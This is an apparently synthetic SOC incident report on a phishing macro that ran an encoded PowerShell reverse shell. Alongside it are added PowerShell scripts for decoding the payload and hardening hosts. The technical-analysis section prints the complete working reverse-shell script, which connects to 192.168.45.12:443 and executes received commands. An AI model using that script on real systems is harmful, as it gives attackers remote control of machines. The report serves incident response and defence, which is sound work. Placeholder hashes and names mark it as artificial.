CrowdStrike Alert Details
Alert ID: CS-POWERSHELL-1059-7842
Alert Time: 2024-02-13 10:22:15 EST
Severity: HIGH (88/100)
Source: CrowdStrike Falcon EDR
Rule: “Suspicious PowerShell Command Line – Encoded Execution”
MITRE ATT&CK: T1059.001 – Command & Scripting Interpreter: PowerShell
Alert Details:
Detection: PowerShell executed with encoded command and hidden window
Host: FIN-WS-045 (Finance Department)
User: bturner (Brian Turner, Accountant)
Time: 10:18 EST
Process Tree:
– explorer.exe (PID: 3421)
  – powershell.exe (PID: 4789)
    Command Line: powershell.exe -NoP -NonI -W Hidden -Enc <base64 payload omitted>
Decoded Command:
– Reverse shell to 192.168.45.12:443
– Interactive PowerShell session
– Masquerading as normal process
Network Connection:
– Destination: 192.168.45.12:443 (Internal IP – Unusual)
– Protocol: TCP
– Status: Established at 10:19 EST
Additional Context:
– User bturner normally does not use PowerShell
– Parent process explorer.exe (unusual for PowerShell)
– Encoded command is a base64-encoded reverse shell
SOC Investigation Process
1. Alert Validation
   Action: Verify CrowdStrike alert
   Tools Used: CrowdStrike Falcon Console
   Findings: Confirmed malicious PowerShell execution
2. Command Decoding
   Action: Decode base64 command
   Tools Used: PowerShell, CyberChef
   Findings: Reverse shell to internal IP 192.168.45.12
3. Immediate Containment
   Action: Isolate host
   Tools Used: CrowdStrike Network Containment
   Findings: Host isolated; process terminated
4. Destination Investigation
   Action: Identify 192.168.45.12
   Tools Used: Splunk, CMDB
   Findings: IP belongs to ENG-WS-023 (compromised engineering workstation)
5. Second Host Isolation
   Action: Isolate C2 host
   Tools Used: CrowdStrike
   Findings: ENG-WS-023 isolated
6. User Interview
   Action: Contact both users
   Tools Used: Phone, Teams
   Findings: Both users unaware; malware identified
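Step 2 above is where the -Enc blob gets decoded. The following PowerShell is an added example, not part of the original report: it decodes the payload the way an analyst would script it (UTF-16LE, the usual stumbling block when CyberChef's plain "From Base64" output looks spaced out), pulls the socket destination that feeds step 4, and counts the indicators the alert rule keyed on. The function name, the indicator list and the flag-matching patterns are assumptions; the sample command line is constructed, and its payload is a short stand-in carrying the report's IoC (192.168.45.12:443), not the full decoded script.

```powershell
# Added triage helper, not part of the original report. Assumes the raw command line
# is available as a string (EDR alert, Sysmon Event ID 1, or Security Event ID 4688).
function Expand-EncodedPowerShellCommand {
    param([Parameter(Mandatory)][string]$CommandLine)

    # powershell.exe accepts abbreviations of -EncodedCommand; this pattern covers the
    # common ones (-e, -ec, -en, -enc, -encodedcommand). Assumed pattern, not exhaustive.
    $m = [regex]::Match($CommandLine, '(?i)(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)')
    if (-not $m.Success) { return $null }

    # The blob is base64 of UTF-16LE text. Decoding it as ASCII/UTF-8 leaves a NUL after
    # every character, which is why a raw "From Base64" in CyberChef looks spaced out.
    $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($m.Groups[1].Value))

    # Pull the socket destination so the next step (identify the host in CMDB/Splunk) has it.
    $dst = [regex]::Match($decoded, '(?i)TcpClient\(\s*["'']?([\d.]+)["'']?\s*,\s*(\d+)')
    $destination = if ($dst.Success) { "$($dst.Groups[1].Value):$($dst.Groups[2].Value)" } else { $null }

    # Flags the alert rule keyed on, plus content markers of the decoded script.
    $indicators = [ordered]@{
        HiddenWindow     = [bool]($CommandLine -match '-w(?:indowstyle)?\s+hidden')
        NoProfile        = [bool]($CommandLine -match '-nop(?:rofile)?\b')
        NonInteractive   = [bool]($CommandLine -match '-noni(?:nteractive)?\b')
        SocketClient     = [bool]($decoded -match 'Net\.Sockets\.TcpClient')
        InvokeExpression = [bool]($decoded -match '\biex\b|Invoke-Expression')
    }
    $hits = @($indicators.GetEnumerator() | Where-Object { $_.Value } | ForEach-Object { $_.Key })

    [pscustomobject]@{
        Decoded     = $decoded
        Destination = $destination
        Indicators  = $hits
        Score       = $hits.Count
    }
}

# Constructed sample: a stand-in payload carrying the report's IoC (192.168.45.12:443),
# encoded the same way the alert's command line was. Not the full decoded script.
$samplePayload = '$client = New-Object System.Net.Sockets.TCPClient("192.168.45.12",443); iex $data'
$b64 = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($samplePayload))
$cmdline = "powershell.exe -NoP -NonI -W Hidden -Enc $b64"

$result = Expand-EncodedPowerShellCommand -CommandLine $cmdline
$result | Format-List
# Triage rule of thumb used here (assumed threshold): hidden window + encoded payload + a socket
# client in the decoded text is enough to escalate before the network connection is confirmed.
if ($result.Score -ge 3) { Write-Host "ESCALATE: $($result.Indicators -join ', ') -> $($result.Destination)" }
```

On the constructed sample this reports all five indicators and a destination of 192.168.45.12:443; in practice the decoded text also goes straight into the ticket so the finding in step 2 is reproducible.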
Jira Incident Report
Ticket: SOC-2024-066
Summary: T1059 – PowerShell Reverse Shell Execution from Finance Workstation
Status: RESOLVED
Resolution: MALICIOUS – C2 Communication Blocked
Priority: P1 – HIGH
Labels: T1059, powershell, command-interpreter, reverse-shell, crowdstrike
Components: Endpoint-Security, Incident-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Suspicious PowerShell Command Line – Encoded Execution”.
Host: FIN-WS-045 (Finance Department, user bturner).
Time: 2024-02-13 10:22 EST.
Technique: MITRE ATT&CK T1059.001 – Command & Scripting Interpreter: PowerShell.
2. Technical Analysis:
Command Analysis:
Base64-encoded command decoded to:
$client = New-Object System.Net.Sockets.TCPClient('192.168.45.12',443);   # connect out to the pivot host
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};                                           # 64 KB receive buffer
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){               # loop until the socket closes
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
    $sendback = (iex $data 2>&1 | Out-String );                           # run received text as PowerShell
    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';                   # append a prompt with the cwd
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);                          # send output back over the socket
    $stream.Flush()
};
$client.Close()
Function: Reverse shell connecting to 192.168.45.12 on port 443
Capabilities: Full interactive PowerShell session for attacker
Attack Chain:
User bturner opened phishing email attachment (Excel macro)
Macro executed PowerShell with encoded command
PowerShell established reverse shell to attacker-controlled internal host (ENG-WS-023)
Attacker used engineering workstation as C2 pivot
C2 Infrastructure:
Primary C2: 192.168.45.12 (ENG-WS-023) – Internal pivot
External C2: 185.143.221[.]89 (from engineering host logs)
Method: Chained connection (Finance → Engineering → External)
3. Investigation Findings:
Timeline:
10:15 – User opens phishing email
10:16 – Excel macro executes
10:17 – PowerShell launches with encoded command
10:18 – Reverse shell connects to ENG-WS-023
10:19 – Connection established
10:22 – CrowdStrike alert triggers
10:23 – FIN-WS-045 isolated
10:25 – ENG-WS-023 identified and isolated
Scope:
2 hosts compromised
No lateral movement beyond these hosts
No data exfiltration detected
Indicators of Compromise (IoCs):
Network:
– Internal C2: 192.168.45.12:443
– External C2: 185.143.221[.]89:443
Files:
– invoice_7823.xlsm (SHA256: a1b2c3…)
– C:\Windows\Temp\svchost.exe (SHA256: d4e5f6…)
Processes:
– powershell.exe with encoded command
4. Containment Actions:
Immediate Actions:
Isolated both hosts via CrowdStrike.
Terminated malicious processes.
Blocked external C2 IP at firewall.
Forensic Collection:
Captured memory from both hosts.
Extracted macro and payloads.
Analyzed reverse shell traffic.
Remediation:
Re-imaged both workstations.
Reset user passwords.
Phishing awareness training for users.
5. Root Cause Analysis:
Primary Cause: Phishing email with malicious macro.
Contributing Factors:
Macros enabled in Office.
No ASR rule blocking Office child processes.
Internal host used as C2 pivot (detected).
6. Business Impact:
Operational Impact: Two workstations offline for 4 hours.
Data Exposure: None (no exfiltration).
7. Remediation & Prevention:
Completed Actions:
Hosts remediated.
Users educated.
IOCs blocked.
Technical Controls Enhanced:
Enabled ASR rule “Block Office applications from creating child processes”.
Blocked macros from internet via GPO.
Enhanced PowerShell logging.
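The three controls listed above, as an added PowerShell example that is not part of the original report. The report rolled them out via GPO; this is the per-host equivalent, which is also a convenient way to verify what the policy should look like on one machine. The ASR rule GUID, the Office 16.0 policy key and the PowerShell logging keys are the documented ones; the script layout and the verification at the end are assumptions.

```powershell
# Added hardening script, not part of the original report. Run from an elevated PowerShell
# on the workstation. The report rolled these out via GPO; this is the per-host equivalent.

# 1. ASR rule "Block all Office applications from creating child processes" (rule GUID
#    D4F940AB-401B-4EFC-AADC-AD5F3C50688A). Add-MpPreference appends to the existing rule
#    list; Set-MpPreference would overwrite any rules already configured.
$asrOfficeChild = 'D4F940AB-401B-4EFC-AADC-AD5F3C50688A'
Add-MpPreference -AttackSurfaceReductionRules_Ids $asrOfficeChild `
                 -AttackSurfaceReductionRules_Actions Enabled

# 2. Block macros in Office documents that carry the Mark of the Web (downloaded or received
#    from the internet). Policy value for Office 2016/M365 (16.0). HKCU applies to the
#    current user only, which is why the report pushed it through GPO.
foreach ($app in 'Excel', 'Word', 'PowerPoint') {
    $key = "HKCU:\SOFTWARE\Policies\Microsoft\Office\16.0\$app\Security"
    New-Item -Path $key -Force | Out-Null
    Set-ItemProperty -Path $key -Name 'BlockContentExecutionFromInternet' -Value 1 -Type DWord
}

# 3. PowerShell script block and module logging. With these on, the decoded script is written
#    to Microsoft-Windows-PowerShell/Operational as Event ID 4104, so the SOC sees plaintext
#    instead of having to decode the -Enc blob by hand.
$psPolicy = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
New-Item -Path "$psPolicy\ScriptBlockLogging" -Force | Out-Null
Set-ItemProperty -Path "$psPolicy\ScriptBlockLogging" -Name 'EnableScriptBlockLogging' -Value 1 -Type DWord
New-Item -Path "$psPolicy\ModuleLogging\ModuleNames" -Force | Out-Null
Set-ItemProperty -Path "$psPolicy\ModuleLogging" -Name 'EnableModuleLogging' -Value 1 -Type DWord
New-ItemProperty -Path "$psPolicy\ModuleLogging\ModuleNames" -Name '*' -Value '*' -PropertyType String -Force | Out-Null

# 4. Verify the ASR rule took effect (1 = Block, 2 = Audit, 0 = Off) and logging is on.
$prefs = Get-MpPreference
$action = 'not set'
for ($i = 0; $i -lt $prefs.AttackSurfaceReductionRules_Ids.Count; $i++) {
    if ($prefs.AttackSurfaceReductionRules_Ids[$i] -ieq $asrOfficeChild) {
        $action = $prefs.AttackSurfaceReductionRules_Actions[$i]
    }
}
Write-Host "ASR Office child-process rule action: $action"
Write-Host "Script block logging: $((Get-ItemProperty "$psPolicy\ScriptBlockLogging").EnableScriptBlockLogging)"
```

With the ASR rule in Block mode, the Excel-to-PowerShell step in the attack chain above fails before any command line is built, and the 4104 events give the SOC the script body even when the launch is otherwise missed.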
8. Conclusion:
Attackers used a phishing email with malicious macro to execute a PowerShell reverse shell, using an internal engineering workstation as a pivot. Rapid detection and containment prevented data exfiltration.
Closure Rationale: Hosts remediated; attacker blocked; enhanced controls implemented.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-13 12:00 EST